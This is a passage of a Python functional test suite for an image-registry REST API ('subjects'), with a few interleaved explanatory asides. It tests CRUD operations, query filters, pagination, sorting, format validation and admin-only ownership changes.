self.assertEqual(0, data['subjects'][0]['size'])
self.assertEqual('ovf', data['subjects'][0]['container_format'])
self.assertEqual('raw', data['subjects'][0]['disk_format'])
self.assertEqual("Subject1", data['subjects'][0]['name'])
# 3. HEAD subject
# Verify status is 'queued'
path = "/v1/subjects/%s" % (subject_id)
response, content = self.http.request(path, 'HEAD')
self.assertEqual(200, response.status)
self.assertEqual("Subject1", response['x-subject-meta-name'])
self.assertEqual("queued", response['x-subject-meta-status'])
self.assertEqual('0', response['x-subject-meta-size'])
self.assertEqual(subject_id, response['x-subject-meta-id'])
# 4. PUT subject with subject data, verify 200 returned
subject_data = "*" * FIVE_KB
headers = {'Content-Type': 'application/octet-stream'}
path = "/v1/subjects/%s" % (subject_id)
response, content = self.http.request(path, 'PUT', headers=headers,
body=subject_data)
self.assertEqual(200, response.status)
data = jsonutils.loads(content)
self.assertEqual(hashlib.md5(subject_data).hexdigest(),
data['subject']['checksum'])
self.assertEqual(FIVE_KB, data['subject']['size'])
self.assertEqual("Subject1", data['subject']['name'])
self.assertTrue(data['subject']['is_public'])
# 5. HEAD subject
# Verify status is 'active'
path = "/v1/subjects/%s" % (subject_id)
response, content = self.http.request(path, 'HEAD')
self.assertEqual(200, response.status)
self.assertEqual("Subject1", response['x-subject-meta-name'])
self.assertEqual("active", response['x-subject-meta-status'])
# 6. GET /subjects
# Verify 1 public subject still...
path = "/v1/subjects"
response, content = self.http.request(path, 'GET')
self.assertEqual(200, response.status)
data = jsonutils.loads(content)
self.assertEqual(hashlib.md5(subject_data).hexdigest(),
data['subjects'][0]['checksum'])
self.assertEqual(subject_id, data['subjects'][0]['id'])
self.assertEqual(FIVE_KB, data['subjects'][0]['size'])
self.assertEqual('ovf', data['subjects'][0]['container_format'])
self.assertEqual('raw', data['subjects'][0]['disk_format'])
self.assertEqual("Subject1", data['subjects'][0]['name'])
# DELETE subject
path = "/v1/subjects/%s" % (subject_id)
response, content = self.http.request(path, 'DELETE')
self.assertEqual(200, response.status)
def test_v1_not_enabled(self):
self.config(enable_v1_api=False)
path = "/v1/subjects"
response, content = self.http.request(path, 'GET')
self.assertEqual(300, response.status)
def test_v1_enabled(self):
self.config(enable_v1_api=True)
path = "/v1/subjects"
response, content = self.http.request(path, 'GET')
self.assertEqual(200, response.status)
def test_zero_initial_size(self):
"""
A test to ensure that a subject with size explicitly set to zero
has a status that immediately transitions to active.
"""
# 1. POST /subjects with public subject named Subject1
# and a size of zero.
# Verify 201 Created returned
headers = {'Content-Type': 'application/octet-stream',
'X-Subject-Meta-Size': '0',
'X-Subject-Meta-Name': 'Subject1',
'X-Subject-Meta-disk_format': 'raw',
'X-Subject-Meta-container_format': 'ovf',
'X-Subject-Meta-Is-Public': 'True'}
path = "/v1/subjects"
response, content = self.http.request(path, 'POST', headers=headers)
self.assertEqual(201, response.status)
subject = jsonutils.loads(content)['subject']
self.assertEqual('active', subject['status'])
# 2. HEAD subject-location
# Verify subject size is zero and the status is active
path = response.get('location')
response, content = self.http.request(path, 'HEAD')
self.assertEqual(200, response.status)
self.assertEqual('0', response['x-subject-meta-size'])
self.assertEqual('active', response['x-subject-meta-status'])
# 3. GET subject-location
# Verify subject content is empty
response, content = self.http.request(path, 'GET')
self.assertEqual(200, response.status)
self.assertEqual(0, len(content))
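`minimal_headers` is defined elsewhere in this module; based on the assertions these tests make against subjects created with it (raw disk format, ovf container format, public), a hypothetical reconstruction looks like:

```python
def minimal_headers(name, public=True):
    # Hypothetical reconstruction of the helper used by these tests:
    # the smallest metadata set needed to register a subject.
    headers = {
        'Content-Type': 'application/octet-stream',
        'X-Subject-Meta-Name': name,
        'X-Subject-Meta-disk_format': 'raw',
        'X-Subject-Meta-container_format': 'ovf',
    }
    if public:
        headers['X-Subject-Meta-Is-Public'] = 'True'
    return headers
```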
def test_traceback_not_consumed(self):
"""
A test to ensure that errors raised by the POST API are not
consumed, and that the actual error message is returned rather
than something like <traceback object at 0x1918d40>
:see https://bugs.launchpad.net/subject/+bug/755912
"""
# POST /subjects with binary data, but not setting
# Content-Type to application/octet-stream, verify a
# 400 returned and that the error is readable.
with tempfile.NamedTemporaryFile() as test_data_file:
test_data_file.write("XXX")
test_data_file.flush()
path = "/v1/subjects"
headers = minimal_headers('Subject1')
headers['Content-Type'] = 'not octet-stream'
response, content = self.http.request(path, 'POST',
body=test_data_file.name,
headers=headers)
self.assertEqual(400, response.status)
expected = "Content-Type must be application/octet-stream"
self.assertIn(expected, content,
"Could not find '%s' in '%s'" % (expected, content))
def test_filtered_subjects(self):
"""
Set up four test subjects and ensure each query param filter works
"""
# 0. GET /subjects
# Verify no public subjects
path = "/v1/subjects"
response, content = self.http.request(path, 'GET')
self.assertEqual(200, response.status)
self.assertEqual('{"subjects": []}', content)
subject_ids = []
# 1. POST /subjects with three public subjects, and one private subject
# with various attributes
headers = {'Content-Type': 'application/octet-stream',
'X-Subject-Meta-Name': 'Subject1',
'X-Subject-Meta-Status': 'active',
'X-Subject-Meta-Container-Format': 'ovf',
'X-Subject-Meta-Disk-Format': 'vdi',
'X-Subject-Meta-Size': '19',
'X-Subject-Meta-Is-Public': 'True',
'X-Subject-Meta-Protected': 'True',
'X-Subject-Meta-Property-pants': 'are on'}
path = "/v1/subjects"
response, content = self.http.request(path, 'POST', headers=headers)
self.assertEqual(201, response.status)
data = jsonutils.loads(content)
self.assertEqual("are on", data['subject']['properties']['pants'])
self.assertTrue(data['subject']['is_public'])
subject_ids.append(data['subject']['id'])
headers = {'Content-Type': 'application/octet-stream',
'X-Subject-Meta-Name': 'My Subject!',
'X-Subject-Meta-Status': 'active',
'X-Subject-Meta-Container-Format': 'ovf',
'X-Subject-Meta-Disk-Format': 'vhd',
'X-Subject-Meta-Size': '20',
'X-Subject-Meta-Is-Public': 'True',
'X-Subject-Meta-Protected': 'False',
'X-Subject-Meta-Property-pants': 'are on'}
path = "/v1/subjects"
response, content = self.http.request(path, 'POST', headers=headers)
self.assertEqual(201, response.status)
data = jsonutils.loads(content)
self.assertEqual("are on", data['subject']['properties']['pants'])
self.assertTrue(data['subject']['is_public'])
subject_ids.append(data['subject']['id'])
headers = {'Content-Type': 'application/octet-stream',
'X-Subject-Meta-Name': 'My Subject!',
'X-Subject-Meta-Status': 'saving',
'X-Subject-Meta-Container-Format': 'ami',
'X-Subject-Meta-Disk-Format': 'ami',
'X-Subject-Meta-Size': '21',
'X-Subject-Meta-Is-Public': 'True',
'X-Subject-Meta-Protected': 'False',
'X-Subject-Meta-Property-pants': 'are off'}
path = "/v1/subjects"
response, content = self.http.request(path, 'POST', headers=headers)
self.assertEqual(201, response.status)
data = jsonutils.loads(content)
self.assertEqual("are off", data['subject']['properties']['pants'])
self.assertTrue(data['subject']['is_public'])
subject_ids.append(data['subject']['id'])
headers = {'Content-Type': 'application/octet-stream',
'X-Subject-Meta-Name': 'My Private Subject',
'X-Subject-Meta-Status': 'active',
'X-Subject-Meta-Container-Format': 'ami',
'X-Subject-Meta-Disk-Format': 'ami',
'X-Subject-Meta-Size': '22',
'X-Subject-Meta-Is-Public': 'False',
'X-Subject-Meta-Protected': 'False'}
path = "/v1/subjects"
response, content = self.http.request(path, 'POST', headers=headers)
self.assertEqual(201, response.status)
data = jsonutils.loads(content)
self.assertFalse(data['subject']['is_public'])
subject_ids.append(data['subject']['id'])
# 2. GET /subjects
# Verify three public subjects
path = "/v1/subjects"
response, content = self.http.request(path, 'GET')
self.assertEqual(200, response.status)
data = jsonutils.loads(content)
self.assertEqual(3, len(data['subjects']))
# 3. GET /subjects with name filter
# Verify correct subjects returned with name
params = "name=My%20Subject!"
path = "/v1/subjects?%s" % (params)
response, content = self.http.request(path, 'GET')
self.assertEqual(200, response.status)
data = jsonutils.loads(content)
self.assertEqual(2, len(data['subjects']))
for subject in data['subjects']:
self.assertEqual("My Subject!", subject['name'])
# 4. GET /subjects with status filter
# Verify correct subjects returned with status
params = "status=queued"
path = "/v1/subjects/detail?%s" % (params)
response, content = self.http.request(path, 'GET')
self.assertEqual(200, response.status)
data = jsonutils.loads(content)
self.assertEqual(3, len(data['subjects']))
for subject in data['subjects']:
self.assertEqual("queued", subject['status'])
params = "status=active"
path = "/v1/subjects/detail?%s" % (params)
response, content = self.http.request(path, 'GET')
self.assertEqual(200, response.status)
data = jsonutils.loads(content)
self.assertEqual(0, len(data['subjects']))
# 5. GET /subjects with container_format filter
# Verify correct subjects returned with container_format
params = "container_format=ovf"
path = "/v1/subjects?%s" % (params)
response, content = self.http.request(path, 'GET')
self.assertEqual(200, response.status)
data = jsonutils.loads(content)
self.assertEqual(2, len(data['subjects']))
for subject in data['subjects']:
self.assertEqual("ovf", subject['container_format'])
# 6. GET /subjects with disk_format filter
# Verify correct subjects returned with disk_format
params = "disk_format=vdi"
path = "/v1/subjects?%s" % (params)
response, content = self.http.request(path, 'GET')
self.assertEqual(200, response.status)
data = jsonutils.loads(content)
self.assertEqual(1, len(data['subjects']))
for subject in data['subjects']:
self.assertEqual("vdi", subject['disk_format'])
# 7. GET /subjects with size_max filter
# Verify correct subjects returned with size <= expected
params = "size_max=20"
path = "/v1/subjects?%s" % (params)
response, content = self.http.request(path, 'GET')
self.assertEqual(200, response.status)
data = jsonutils.loads(content)
self.assertEqual(2, len(data['subjects']))
for subject in data['subjects']:
self.assertLessEqual(subject['size'], 20)
# 8. GET /subjects with size_min filter
# Verify correct subjects returned with size >= expected
params = "size_min=20"
path = "/v1/subjects?%s" % (params)
response, content = self.http.request(path, 'GET')
self.assertEqual(200, response.status)
data = jsonutils.loads(content)
self.assertEqual(2, len(data['subjects']))
for subject in data['subjects']:
self.assertGreaterEqual(subject['size'], 20)
# 9. GET /subjects with is_public=None filter
# Verify correct subjects returned with property
# Bug lp:803656 Support is_public in filtering
params = "is_public=None"
path = "/v1/subjects?%s" % (params)
response, content = self.http.request(path, 'GET')
self.assertEqual(200, response.status)
data = jsonutils.loads(content)
self.assertEqual(4, len(data['subjects']))
# 10. GET /subjects with is_public=False filter
# Verify correct subjects returned with property
# Bug lp:803656 Support is_public in filtering
params = "is_public=False"
path = "/v1/subjects?%s" % (params)
response, content = self.http.request(path, 'GET')
self.assertEqual(200, response.status)
data = jsonutils.loads(content)
self.assertEqual(1, len(data['subjects']))
for subject in data['subjects']:
self.assertEqual("My Private Subject", subject['name'])
# 11. GET /subjects with is_public=True filter
# Verify correct subjects returned with property
# Bug lp:803656 Support is_public in filtering
params = "is_public=True"
path = "/v1/subjects?%s" % (params)
response, content = self.http.request(path, 'GET')
self.assertEqual(200, response.status)
data = jsonutils.loads(content)
self.assertEqual(3, len(data['subjects']))
for subject in data['subjects']:
self.assertNotEqual(subject['name'], "My Private Subject")
# 12. GET /subjects with protected=False filter
# Verify correct subjects returned with property
params = "protected=False"
path = "/v1/subjects?%s" % (params)
response, content = self.http.request(path, 'GET')
self.assertEqual(200, response.status)
data = jsonutils.loads(content)
self.assertEqual(2, len(data['subjects']))
for subject in data['subjects']:
self.assertNotEqual(subject['name'], "Subject1")
# 13. GET /subjects with protected=True filter
# Verify correct subjects returned with property
params = "protected=True"
path = "/v1/subjects?%s" % (params)
response, content = self.http.request(path, 'GET')
self.assertEqual(200, response.status)
data = jsonutils.loads(content)
self.assertEqual(1, len(data['subjects']))
for subject in data['subjects']:
self.assertEqual("Subject1", subject['name'])
# 14. GET /subjects with property filter
# Verify correct subjects returned with property
params = "property-pants=are%20on"
path = "/v1/subjects/detail?%s" % (params)
response, content = self.http.request(path, 'GET')
self.assertEqual(200, response.status)
data = jsonutils.loads(content)
self.assertEqual(2, len(data['subjects']))
for subject in data['subjects']:
self.assertEqual("are on", subject['properties']['pants'])
# 15. GET /subjects with property filter and name filter
# Verify correct subjects returned with property and name
# Make sure you quote the url when using more than one param!
params = "name=My%20Subject!&property-pants=are%20on"
path = "/v1/subjects/detail?%s" % (params)
response, content = self.http.request(path, 'GET')
self.assertEqual(200, response.status)
data = jsonutils.loads(content)
self.assertEqual(1, len(data['subjects']))
for subject in data['subjects']:
self.assertEqual("are on", subject['properties']['pants'])
self.assertEqual("My Subject!", subject['name'])
# 16. GET /subjects with past changes-since filter
yesterday = timeutils.isotime(timeutils.utcnow() -
datetime.timedelta(1))
params = "changes-since=%s" % yesterday
path = "/v1/subjects?%s" % (params)
response, content = self.http.request(path, 'GET')
self.assertEqual(200, response.status)
data = jsonutils.loads(content)
self.assertEqual(3, len(data['subjects']))
# one timezone west of Greenwich equates to an hour ago
# taking care to pre-urlencode '+' as '%2B', otherwise the timezone
# '+' is wrongly decoded as a space
# TODO(eglynn): investigate '+' --> <SPACE> decoding, an artifact
# of WSGI/webob dispatch?
now = timeutils.utcnow()
hour_ago = now.strftime('%Y-%m-%dT%H:%M:%S%%2B01:00')
params = "changes-since=%s" % hour_ago
path = "/v1/subjects?%s" % (params)
response, content = self.http.request(path, 'GET')
self.assertEqual(200, response.status)
data = jsonutils.loads(content)
self.assertEqual(3, len(data['subjects']))
# 17. GET /subjects with future changes-since filter
tomorrow = timeutils.isotime(timeutils.utcnow() +
datetime.timedelta(1))
params = "changes-since=%s" % tomorrow
path = "/v1/subjects?%s" % (params)
response, content = self.http.request(path, 'GET')
self.assertEqual(200, response.status)
data = jsonutils.loads(content)
self.assertEqual(0, len(data['subjects']))
# one timezone east of Greenwich equates to an hour from now
now = timeutils.utcnow()
hour_hence = now.strftime('%Y-%m-%dT%H:%M:%S-01:00')
params = "changes-since=%s" % hour_hence
path = "/v1/subjects?%s" % (params)
response, content = self.http.request(path, 'GET')
self.assertEqual(200, response.status)
data = jsonutils.loads(content)
self.assertEqual(0, len(data['subjects']))
# 18. GET /subjects with invalid (negative) size_min filter
# Verify 400 returned
params = "size_min=-1"
path = "/v1/subjects?%s" % (params)
response, content = self.http.request(path, 'GET')
self.assertEqual(400, response.status)
self.assertIn("filter size_min got -1", content)
# 19. GET /subjects with invalid (negative) size_max filter
# Verify 400 returned
params = "size_max=-1"
path = "/v1/subjects?%s" % (params)
response, content = self.http.request(path, 'GET')
self.assertEqual(400, response.status)
self.assertIn("filter size_max got -1", content)
# 20. GET /subjects with invalid (negative) min_ram filter
# Verify 400 returned
params = "min_ram=-1"
path = "/v1/subjects?%s" % (params)
response, content = self.http.request(path, 'GET')
self.assertEqual(400, response.status)
self.assertIn("Bad value passed to filter min_ram got -1", content)
# 21. GET /subjects with invalid protected filter value
# Verify 400 returned
params = "protected=imalittleteapot"
path = "/v1/subjects?%s" % (params)
response, content = self.http.request(path, 'GET')
self.assertEqual(400, response.status)
self.assertIn("protected got imalittleteapot", content)
# 22. GET /subjects with invalid is_public filter value
# Verify 400 returned
params = "is_public=imalittleteapot"
path = "/v1/subjects?%s" % (params)
response, content = self.http.request(path, 'GET')
self.assertEqual(400, response.status)
self.assertIn("is_public got imalittleteapot", content)
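Steps 16 and 17 hand-encode the '+' of a timezone offset as '%2B' so it is not decoded as a space by the WSGI layer. The same encoding can be done with the standard library; this helper name is illustrative, not part of the suite:

```python
import datetime
import urllib.parse


def changes_since_param(dt, tz_offset=''):
    # Percent-encode the timestamp so a '+' in the timezone offset
    # survives query-string decoding ('+' would otherwise be read
    # back as a space by WSGI/webob dispatch).
    stamp = dt.strftime('%Y-%m-%dT%H:%M:%S') + tz_offset
    return 'changes-since=' + urllib.parse.quote(stamp, safe=':-')


# One timezone east of Greenwich, as in step 16:
param = changes_since_param(datetime.datetime(2015, 6, 1, 12, 0, 0), '+01:00')
```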
def test_limited_subjects(self):
"""
Ensure marker and limit query params work
"""
# 0. GET /subjects
# Verify no public subjects
path = "/v1/subjects"
response, content = self.http.request(path, 'GET')
self.assertEqual(200, response.status)
self.assertEqual('{"subjects": []}', content)
subject_ids = []
# 1. POST /subjects with three public subjects with various attributes
headers = minimal_headers('Subject1')
path = "/v1/subjects"
response, content = self.http.request(path, 'POST', headers=headers)
self.assertEqual(201, response.status)
subject_ids.append(jsonutils.loads(content)['subject']['id'])
headers = minimal_headers('Subject2')
path = "/v1/subjects"
response, content = self.http.request(path, 'POST', headers=headers)
self.assertEqual(201, response.status)
subject_ids.append(jsonutils.loads(content)['subject']['id'])
headers = minimal_headers('Subject3')
path = "/v1/subjects"
response, content = self.http.request(path, 'POST', headers=headers)
self.assertEqual(201, response.status)
subject_ids.append(jsonutils.loads(content)['subject']['id'])
# 2. GET /subjects with all subjects
path = "/v1/subjects"
response, content = self.http.request(path, 'GET')
self.assertEqual(200, response.status)
subjects = jsonutils.loads(content)['subjects']
self.assertEqual(3, len(subjects))
# 3. GET /subjects with limit of 2
# Verify only two subjects were returned
params = "limit=2"
path = "/v1/subjects?%s" % (params)
response, content = self.http.request(path, 'GET')
self.assertEqual(200, response.status)
data = jsonutils.loads(content)['subjects']
self.assertEqual(2, len(data))
self.assertEqual(subjects[0]['id'], data[0]['id'])
self.assertEqual(subjects[1]['id'], data[1]['id'])
# 4. GET /subjects with marker
# Verify only two subjects were returned
params = "marker=%s" % subjects[0]['id']
path = "/v1/subjects?%s" % (params)
response, content = self.http.request(path, 'GET')
self.assertEqual(200, response.status)
data = jsonutils.loads(content)['subjects']
self.assertEqual(2, len(data))
self.assertEqual(subjects[1]['id'], data[0]['id'])
self.assertEqual(subjects[2]['id'], data[1]['id'])
# 5. GET /subjects with marker and limit
# Verify only one subject was returned with the correct id
params = "limit=1&marker=%s" % subjects[1]['id']
path = "/v1/subjects?%s" % (params)
response, content = self.http.request(path, 'GET')
self.assertEqual(200, response.status)
data = jsonutils.loads(content)['subjects']
self.assertEqual(1, len(data))
self.assertEqual(subjects[2]['id'], data[0]['id'])
# 6. GET /subjects/detail with marker and limit
# Verify only one subject was returned with the correct id
params = "limit=1&marker=%s" % subjects[1]['id']
path = "/v1/subjects/detail?%s" % (params)
response, content = self.http.request(path, 'GET')
self.assertEqual(200, response.status)
data = jsonutils.loads(content)['subjects']
self.assertEqual(1, len(data))
self.assertEqual(subjects[2]['id'], data[0]['id'])
# DELETE subjects
for subject_id in subject_ids:
path = "/v1/subjects/%s" % (subject_id)
response, content = self.http.request(path, 'DELETE')
self.assertEqual(200, response.status)
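The marker/limit semantics exercised above — results begin strictly after the subject whose id equals the marker, then the page is capped at limit — can be sketched as a pure function (illustrative, not the server's implementation):

```python
def paginate(subjects, marker=None, limit=None):
    # Results begin strictly after the subject whose id equals the
    # marker; a limit then caps the page size.
    start = 0
    if marker is not None:
        ids = [s['id'] for s in subjects]
        start = ids.index(marker) + 1
    page = subjects[start:]
    if limit is not None:
        page = page[:limit]
    return page
```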
def test_ordered_subjects(self):
"""
Set up three test subjects and ensure the sort_key and sort_dir query params work
"""
# 0. GET /subjects
# Verify no public subjects
path = "/v1/subjects"
response, content = self.http.request(path, 'GET')
self.assertEqual(200, response.status)
self.assertEqual('{"subjects": []}', content)
# 1. POST /subjects with three public subjects with various attributes
subject_ids = []
headers = {'Content-Type': 'application/octet-stream',
'X-Subject-Meta-Name': 'Subject1',
'X-Subject-Meta-Status': 'active',
'X-Subject-Meta-Container-Format': 'ovf',
'X-Subject-Meta-Disk-Format': 'vdi',
'X-Subject-Meta-Size': '19',
'X-Subject-Meta-Is-Public': 'True'}
path = "/v1/subjects"
response, content = self.http.request(path, 'POST', headers=headers)
self.assertEqual(201, response.status)
subject_ids.append(jsonutils.loads(content)['subject']['id'])
headers = {'Content-Type': 'application/octet-stream',
'X-Subject-Meta-Name': 'ASDF',
'X-Subject-Meta-Status': 'active',
'X-Subject-Meta-Container-Format': 'bare',
'X-Subject-Meta-Disk-Format': 'iso',
'X-Subject-Meta-Size': '2',
'X-Subject-Meta-Is-Public': 'True'}
path = "/v1/subjects"
response, content = self.http.request(path, 'POST', headers=headers)
self.assertEqual(201, response.status)
subject_ids.append(jsonutils.loads(content)['subject']['id'])
headers = {'Content-Type': 'application/octet-stream',
'X-Subject-Meta-Name': 'XYZ',
'X-Subject-Meta-Status': 'saving',
'X-Subject-Meta-Container-Format': 'ami',
'X-Subject-Meta-Disk-Format': 'ami',
'X-Subject-Meta-Size': '5',
'X-Subject-Meta-Is-Public': 'True'}
path = "/v1/subjects"
response, content = self.http.request(path, 'POST', headers=headers)
self.assertEqual(201, response.status)
subject_ids.append(jsonutils.loads(content)['subject']['id'])
# 2. GET /subjects with no query params
# Verify three public subjects sorted by created_at desc
path = "/v1/subjects"
response, content = self.http.request(path, 'GET')
self.assertEqual(200, response.status)
data = jsonutils.loads(content)
self.assertEqual(3, len(data['subjects']))
self.assertEqual(subject_ids[2], data['subjects'][0]['id'])
self.assertEqual(subject_ids[1], data['subjects'][1]['id'])
self.assertEqual(subject_ids[0], data['subjects'][2]['id'])
# 3. GET /subjects sorted by name asc
params = 'sort_key=name&sort_dir=asc'
path = "/v1/subjects?%s" % (params)
response, content = self.http.request(path, 'GET')
self.assertEqual(200, response.status)
data = jsonutils.loads(content)
self.assertEqual(3, len(data['subjects']))
self.assertEqual(subject_ids[1], data['subjects'][0]['id'])
self.assertEqual(subject_ids[0], data['subjects'][1]['id'])
self.assertEqual(subject_ids[2], data['subjects'][2]['id'])
# 4. GET /subjects sorted by size desc
params = 'sort_key=size&sort_dir=desc'
path = "/v1/subjects?%s" % (params)
response, content = self.http.request(path, 'GET')
self.assertEqual(200, response.status)
data = jsonutils.loads(content)
self.assertEqual(3, len(data['subjects']))
self.assertEqual(subject_ids[0], data['subjects'][0]['id'])
self.assertEqual(subject_ids[2], data['subjects'][1]['id'])
self.assertEqual(subject_ids[1], data['subjects'][2]['id'])
# 5. GET /subjects sorted by size desc with a marker
params = 'sort_key=size&sort_dir=desc&marker=%s' % subject_ids[0]
path = "/v1/subjects?%s" % (params)
response, content = self.http.request(path, 'GET')
self.assertEqual(200, response.status)
data = jsonutils.loads(content)
self.assertEqual(2, len(data['subjects']))
self.assertEqual(subject_ids[2], data['subjects'][0]['id'])
self.assertEqual(subject_ids[1], data['subjects'][1]['id'])
# 6. GET /subjects sorted by name asc with a marker
params = 'sort_key=name&sort_dir=asc&marker=%s' % subject_ids[2]
path = "/v1/subjects?%s" % (params)
response, content = self.http.request(path, 'GET')
self.assertEqual(200, response.status)
data = jsonutils.loads(content)
self.assertEqual(0, len(data['subjects']))
# DELETE subjects
for subject_id in subject_ids:
path = "/v1/subjects/%s" % (subject_id)
response, content = self.http.request(path, 'DELETE')
self.assertEqual(200, response.status)
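The sort_key/sort_dir orderings asserted above reduce to an ordinary keyed sort; a minimal sketch (again illustrative, not the server code):

```python
def sort_subjects(subjects, sort_key='created_at', sort_dir='desc'):
    # Order subjects by the requested key, descending by default,
    # mirroring the v1 API's default created_at desc ordering.
    return sorted(subjects, key=lambda s: s[sort_key],
                  reverse=(sort_dir == 'desc'))
```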
def test_duplicate_subject_upload(self):
"""
Upload initial subject, then attempt to upload duplicate subject
"""
# 0. GET /subjects
# Verify no public subjects
path = "/v1/subjects"
response, content = self.http.request(path, 'GET')
self.assertEqual(200, response.status)
self.assertEqual('{"subjects": []}', content)
# 1. POST /subjects with public subject named Subject1
headers = {'Content-Type': 'application/octet-stream',
'X-Subject-Meta-Name': 'Subject1',
'X-Subject-Meta-Status': 'active',
'X-Subject-Meta-Container-Format': 'ovf',
'X-Subject-Meta-Disk-Format': 'vdi',
'X-Subject-Meta-Size': '19',
'X-Subject-Meta-Is-Public': 'True'}
path = "/v1/subjects"
response, content = self.http.request(path, 'POST', headers=headers)
self.assertEqual(201, response.status)
subject = jsonutils.loads(content)['subject']
# 2. POST /subjects with a public subject reusing Subject1's ID
headers = {'Content-Type': 'application/octet-stream',
'X-Subject-Meta-Name': 'Subject1 Update',
'X-Subject-Meta-Status': 'active',
'X-Subject-Meta-Container-Format': 'ovf',
'X-Subject-Meta-Disk-Format': 'vdi',
'X-Subject-Meta-Size': '19',
'X-Subject-Meta-Id': subject['id'],
'X-Subject-Meta-Is-Public': 'True'}
path = "/v1/subjects"
response, content = self.http.request(path, 'POST', headers=headers)
self.assertEqual(409, response.status)
def test_delete_not_existing(self):
"""
We test the following:
0. GET /subjects
- Verify no public subjects
1. DELETE /subjects/1
- Verify 404
"""
# 0. GET /subjects
# Verify no public subjects
path = "/v1/subjects"
response, content = self.http.request(path, 'GET')
self.assertEqual(200, response.status)
self.assertEqual('{"subjects": []}', content)
# 1. DELETE /subjects/1
# Verify 404 returned
path = "/v1/subjects/1"
response, content = self.http.request(path, 'DELETE')
self.assertEqual(404, response.status)
def _do_test_post_subject_content_bad_format(self, format):
"""
We test that an invalid container/disk format fails with 400 "Bad Request"
:see https://bugs.launchpad.net/subject/+bug/933702
"""
# Verify no public subjects
path = "/v1/subjects"
response, content = self.http.request(path, 'GET')
self.assertEqual(200, response.status)
subjects = jsonutils.loads(content)['subjects']
self.assertEqual(0, len(subjects))
path = "/v1/subjects"
# POST /subjects with an invalid value for the given format
headers = minimal_headers('Subject1')
headers['X-Subject-Meta-' + format] = 'bad_value'
with tempfile.NamedTemporaryFile() as test_data_file:
test_data_file.write("XXX")
test_data_file.flush()
response, content = self.http.request(path, 'POST',
headers=headers,
body=test_data_file.name)
self.assertEqual(400, response.status)
type = format.replace('_format', '')
expected = "Invalid %s format 'bad_value' for subject" % type
self.assertIn(expected, content,
"Could not find '%s' in '%s'" % (expected, content))
# make sure the subject was not created
# Verify no public subjects
path = "/v1/subjects"
response, content = self.http.request(path, 'GET')
self.assertEqual(200, response.status)
subjects = jsonutils.loads(content)['subjects']
self.assertEqual(0, len(subjects))
def test_post_subject_content_bad_container_format(self):
self._do_test_post_subject_content_bad_format('container_format')
def test_post_subject_content_bad_disk_format(self):
self._do_test_post_subject_content_bad_format('disk_format')
def _do_test_put_subject_content_missing_format(self, format):
"""
We test that missing container/disk format only fails with
400 "Bad Request" when the subject content is PUT (i.e. not
on the original POST of a queued subject).
:see https://bugs.launchpad.net/subject/+bug/937216
"""
# POST queued subject
path = "/v1/subjects"
headers = {
'X-Subject-Meta-Name': 'Subject1',
'X-Subject-Meta-Is-Public': 'True',
}
response, content = self.http.request(path, 'POST', headers=headers)
self.assertEqual(201, response.status)
data = jsonutils.loads(content)
subject_id = data['subject']['id']
self.addDetail('subject_data', testtools.content.json_content(data))
# PUT subject content without the given format being specified
path = "/v1/subjects/%s" % (subject_id)
headers = minimal_headers('Subject1')
del headers['X-Subject-Meta-' + format]
with tempfile.NamedTemporaryFile() as test_data_file:
test_data_file.write("XXX")
test_data_file.flush()
response, content = self.http.request(path, 'PUT',
headers=headers,
body=test_data_file.name)
self.assertEqual(400, response.status)
type = format.replace('_format', '').capitalize()
expected = "%s format is not specified" % type
self.assertIn(expected, content,
"Could not find '%s' in '%s'" % (expected, content))
def test_put_subject_content_bad_container_format(self):
self._do_test_put_subject_content_missing_format('container_format')
def test_put_subject_content_bad_disk_format(self):
self._do_test_put_subject_content_missing_format('disk_format')
def _do_test_mismatched_attribute(self, attribute, value):
"""
Test mismatched attribute.
"""
subject_data = "*" * FIVE_KB
headers = minimal_headers('Subject1')
headers[attribute] = value
path = "/v1/subjects"
response, content = self.http.request(path, 'POST', headers=headers,
body=subject_data)
self.assertEqual(400, response.status)
subjects_dir = os.path.join(self.test_dir, 'subjects')
subject_count = len([name for name in os.listdir(subjects_dir)
if os.path.isfile(os.path.join(subjects_dir, name))])
self.assertEqual(0, subject_count)
def test_mismatched_size(self):
"""
Test mismatched size.
"""
self._do_test_mismatched_attribute('x-subject-meta-size',
str(FIVE_KB + 1))
def test_mismatched_checksum(self):
"""
Test mismatched checksum.
"""
self._do_test_mismatched_attribute('x-subject-meta-checksum',
'foobar')
class TestApiWithFakeAuth(base.ApiTest):
def __init__(self, *args, **kwargs):
super(TestApiWithFakeAuth, self).__init__(*args, **kwargs)
self.api_flavor = 'fakeauth'
self.registry_flavor = 'fakeauth'
def test_ownership(self):
# Add a subject with admin privileges and ensure the owner
# can be set to something other than what was used to authenticate
auth_headers = {
'X-Auth-Token': 'user1:tenant1:admin',
}
create_headers = {
'X-Subject-Meta-Name': 'MySubject',
'X-Subject-Meta-disk_format': 'raw',
'X-Subject-Meta-container_format': 'ovf',
'X-Subject-Meta-Is-Public': 'True',
'X-Subject-Meta-Owner': 'tenant2',
}
create_headers.update(auth_headers)
path = "/v1/subjects"
response, content = self.http.request(path, 'POST',
headers=create_headers)
self.assertEqual(201, response.status)
data = jsonutils.loads(content)
subject_id = data['subject']['id']
path = "/v1/subjects/%s" % (subject_id)
response, content = self.http.request(path, 'HEAD',
headers=auth_headers)
self.assertEqual(200, response.status)
self.assertEqual('tenant2', response['x-subject-meta-owner'])
# Now add a subject without admin privileges and ensure the owner
# cannot be set to something other than what was used to authenticate
auth_headers = {
'X-Auth-Token': 'user1:tenant1:role1',
}
create_headers.update(auth_headers)
path = "/v1/subjects"
response, content = self.http.request(path, 'POST',
headers=create_headers)
self.assertEqual(201, response.status)
data = jsonutils.loads(content)
subject_id = data['subject']['id']
# We have to be admin to see the owner
auth_headers = {
'X-Auth-Token': 'user1:tenant1:admin',
}
create_headers.update(auth_headers)
path = "/v1/subjects/%s" % (subject_id)
response, content = self.http.request(path, 'HEAD',
headers=auth_headers)
self.assertEqual(200, response.status)
self.assertEqual('tenant1', response['x-subject-meta-owner'])
# Make sure the non-privileged user can't update their owner either
update_headers = {
'X-Subject-Meta-Name': 'MySubject2',
'X-Subject-Meta-Owner': 'tenant2',
'X-Auth-Token': 'user1:tenant1:role1',
}
path = "/v1/subjects/%s" % (subject_id)
response, content = self.http.request(path, 'PUT',
headers=update_headers)
self.assertEqual(200, response.status)
# We have to be admin to see the owner
auth_headers = {
'X-Auth-Token': 'user1:tenant1:admin',
}
path = "/v1/subjects/%s" % (subject_id)
response, content = self.http.request(path, 'HEAD',
headers=auth_headers)
self.assertEqual(200, response.status)
self.assertEqual('tenant1', response['x-subject-meta-owner'])
# An admin user should be able to update the owner
auth_headers = {
